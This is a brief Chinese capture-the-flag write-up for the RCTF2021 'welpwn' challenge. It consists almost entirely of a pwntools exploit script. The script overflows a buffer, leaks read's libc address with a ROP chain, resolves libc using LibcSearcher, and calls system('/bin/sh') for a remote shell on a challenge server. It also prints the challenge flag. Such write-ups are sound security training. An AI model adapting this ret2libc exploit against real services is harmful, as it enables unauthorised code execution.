[RCTF2021]welpwn

题目分析

这一题拿来测试LibcSearcher的,没感情,直接上EXP:

from pwn import *
from LibcSearcher import *

r = remote('61.147.171.105',63406)
context(os = 'linux',log_level = "debug")
pop_rdi = 0x4008a3
pop_rsi = 0x4008a1
pop_4 = 0x40089c
main_addr = 0x4007CD
elf = ELF("./welpwn")
puts_plt = elf.plt['puts']
read_got = elf.got['read']
r.recvuntil("Welcome to RCTF\n")
payload = b'a' * 0x18 + p64(pop_4) + p64(pop_rdi) + p64(read_got) + p64(puts_plt) + p64(main_addr)
r.sendline(payload)

r.recvuntil(b'a' * 0x18)
r.recv(3)
read_addr = u64(r.recv(6).ljust(8,b'\x00'))
print("read:",hex(read_addr))
libc = LibcSearcher("read", read_addr)
# libc =ELF('./libc6_2.23-0ubuntu10_amd64.so')
libc_base = read_addr - libc.dump("read")
system = libc_base + libc.dump("system")
print("system:",hex(system))
bin_sh = libc_base + libc.dump("str_bin_sh")
print("bin_sh:",hex(bin_sh))
payload =b'a' * 0x18 +p64(pop_4) + p64(pop_rdi) + p64(bin_sh) + p64(system)
r.sendline(payload)
r.interactive()
# cyberpeace{45c1180b9ea8e1f0fb88c08518427f51}